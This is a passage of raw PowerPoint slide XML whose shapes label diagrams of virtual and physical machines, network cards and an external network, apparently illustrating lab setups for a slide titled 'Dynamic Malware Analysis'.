            <p:cNvPr id="270" name="CustomShape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3390480" y="3703680"/>
              <a:ext cx="1367640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>App.</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="271" name="CustomShape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3390480" y="4712040"/>
              <a:ext cx="1367640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>App.</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="272" name="CustomShape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6012360" y="2983680"/>
              <a:ext cx="2160000" cy="2448000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="273" name="CustomShape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6408360" y="3199680"/>
              <a:ext cx="1367640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>App.</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="274" name="CustomShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6408360" y="4092840"/>
              <a:ext cx="1367640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>App.</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="275" name="CustomShape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6630120" y="4946040"/>
              <a:ext cx="109548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Guest OS </a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="276" name="CustomShape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5466960" y="5412960"/>
              <a:ext cx="44244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OS</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="277" name="CustomShape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6160320" y="2590200"/>
              <a:ext cx="1700640" cy="639720"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Virtual machine</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="278" name="CustomShape 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5185080" y="1966680"/>
              <a:ext cx="1815480" cy="639720"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Physical machine</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="280" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="816480" y="1495800"/>
            <a:ext cx="5688360" cy="1007640"/>
            <a:chOff x="816480" y="1495800"/>
            <a:chExt cx="5688360" cy="1007640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="281" name="CustomShape 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4848840" y="1495800"/>
              <a:ext cx="1656000" cy="1007640"/>
            </a:xfrm>
            <a:prstGeom prst="cloud">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>External Network</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="282" name="Group 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="816480" y="1539360"/>
              <a:ext cx="1656000" cy="791640"/>
              <a:chOff x="816480" y="1539360"/>
              <a:chExt cx="1656000" cy="791640"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="283" name="CustomShape 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="888480" y="1539360"/>
                <a:ext cx="1295640" cy="791640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25560">
                <a:solidFill>
                  <a:srgbClr val="395e89"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="0"/>
              <a:fillRef idx="0"/>
              <a:effectRef idx="0"/>
              <a:fontRef idx="minor"/>
            </p:style>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="284" name="CustomShape 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="816480" y="1570680"/>
                <a:ext cx="1656000" cy="3049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000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                  </a:rPr>
                  <a:t>Virtual Machine</a:t>
                </a:r>
                <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                  <a:latin typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="285" name="CustomShape 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1752480" y="2043360"/>
                <a:ext cx="431640" cy="287640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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200" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="ffffff"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                  </a:rPr>
                  <a:t>NIC</a:t>
                </a:r>
                <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                  <a:latin typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="286" name="CustomShape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2976480" y="1539360"/>
              <a:ext cx="1295640" cy="791640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="287" name="CustomShape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2904480" y="1570680"/>
              <a:ext cx="1656000" cy="5173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000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Physical Machine</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="288" name="CustomShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3840480" y="2043360"/>
              <a:ext cx="431640" cy="287640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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200" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>NIC</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="289" name="CustomShape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2976480" y="2043360"/>
              <a:ext cx="431640" cy="287640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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200" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>NIC</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="290" name="CustomShape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2184480" y="2187720"/>
              <a:ext cx="791640" cy="360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9360">
              <a:solidFill>
                <a:srgbClr val="4a7dba"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="291" name="CustomShape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4272840" y="2187720"/>
              <a:ext cx="575640" cy="360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9360">
              <a:solidFill>
                <a:srgbClr val="4a7dba"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="292" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="827640" y="3399120"/>
            <a:ext cx="3600000" cy="3170880"/>
            <a:chOff x="827640" y="3399120"/>
            <a:chExt cx="3600000" cy="3170880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="293" name="Group 15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="827640" y="4597920"/>
              <a:ext cx="1656000" cy="792000"/>
              <a:chOff x="827640" y="4597920"/>
              <a:chExt cx="1656000" cy="792000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="294" name="CustomShape 16"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="899640" y="4597920"/>
                <a:ext cx="1295640" cy="791640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25560">
                <a:solidFill>
                  <a:srgbClr val="395e89"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="0"/>
              <a:fillRef idx="0"/>
              <a:effectRef idx="0"/>
              <a:fontRef idx="minor"/>
            </p:style>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="295" name="CustomShape 17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="827640" y="4629240"/>
                <a:ext cx="1656000" cy="51804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000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                  </a:rPr>
                  <a:t>Virtual Machine</a:t>
                </a:r>
                <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                  <a:latin typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:lnSpc>
                    <a:spcPct val="100000"/>
                  </a:lnSpc>
                  <a:tabLst>
                    <a:tab algn="l" pos="0"/>
                  </a:tabLst>
                </a:pPr>
                <a:r>
                  <a:rPr b="0" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                  </a:rPr>
                  <a:t>Service</a:t>
                </a:r>
                <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                  <a:latin typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="296" name="CustomShape 18"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1763640" y="5102280"/>
                <a:ext cx="431640" cy="287640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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200" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="ffffff"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                  </a:rPr>
                  <a:t>NIC</a:t>
                </a:r>
                <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                  <a:latin typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="297" name="Group 19"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="827640" y="3399120"/>
              <a:ext cx="3600000" cy="1007640"/>
              <a:chOff x="827640" y="3399120"/>
              <a:chExt cx="3600000" cy="1007640"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="298" name="CustomShape 20"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2771640" y="3399120"/>
                <a:ext cx="1656000" cy="1007640"/>
              </a:xfrm>
              <a:prstGeom prst="cloud">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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800" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="ffffff"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                  </a:rPr>
                  <a:t>External Network</a:t>
                </a:r>
                <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                  <a:latin typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="299" name="CustomShape 21"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="899640" y="3443040"/>
                <a:ext cx="1295640" cy="791640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25560">
                <a:solidFill>
                  <a:srgbClr val="395e89"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="0"/>
              <a:fillRef idx="0"/>
              <a:effectRef idx="0"/>
              <a:fontRef idx="minor"/>
            </p:style>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="300" name="CustomShape 22"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="827640" y="3474360"/>
                <a:ext cx="1656000" cy="5173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000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                  </a:rPr>
                  <a:t>Physical Machine</a:t>
                </a:r>
                <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                  <a:latin typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="301" name="CustomShape 23"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1763640" y="3947040"/>
                <a:ext cx="431640" cy="287640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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200" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="ffffff"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                  </a:rPr>
                  <a:t>NIC</a:t>
                </a:r>
                <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                  <a:latin typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="302" name="CustomShape 24"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2195640" y="4091040"/>
                <a:ext cx="575640" cy="360"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21600" h="21600">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21600"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="9360">
                <a:solidFill>
                  <a:srgbClr val="4a7dba"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="0"/>
              <a:fillRef idx="0"/>
              <a:effectRef idx="0"/>
              <a:fontRef idx="minor"/>
            </p:style>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="303" name="Group 25"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="827640" y="5778360"/>
              <a:ext cx="1656000" cy="791640"/>
              <a:chOff x="827640" y="5778360"/>
              <a:chExt cx="1656000" cy="791640"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="304" name="CustomShape 26"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="899640" y="5778360"/>
                <a:ext cx="1295640" cy="791640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25560">
                <a:solidFill>
                  <a:srgbClr val="395e89"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="0"/>
              <a:fillRef idx="0"/>
              <a:effectRef idx="0"/>
              <a:fontRef idx="minor"/>
            </p:style>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="305" name="CustomShape 27"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="827640" y="5809680"/>
                <a:ext cx="1656000" cy="51804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000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                  </a:rPr>
                  <a:t>Virtual Machine</a:t>
                </a:r>
                <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                  <a:latin typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:lnSpc>
                    <a:spcPct val="100000"/>
                  </a:lnSpc>
                  <a:tabLst>
                    <a:tab algn="l" pos="0"/>
                  </a:tabLst>
                </a:pPr>
                <a:r>
                  <a:rPr b="0" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                  </a:rPr>
                  <a:t>Analysis</a:t>
                </a:r>
                <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                  <a:latin typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="306" name="CustomShape 28"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1763640" y="6282360"/>
                <a:ext cx="431640" cy="287640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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200" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="ffffff"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                  </a:rPr>
                  <a:t>NIC</a:t>
                </a:r>
                <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                  <a:latin typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="307" name="CustomShape 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3204000" y="5538240"/>
              <a:ext cx="863640" cy="532080"/>
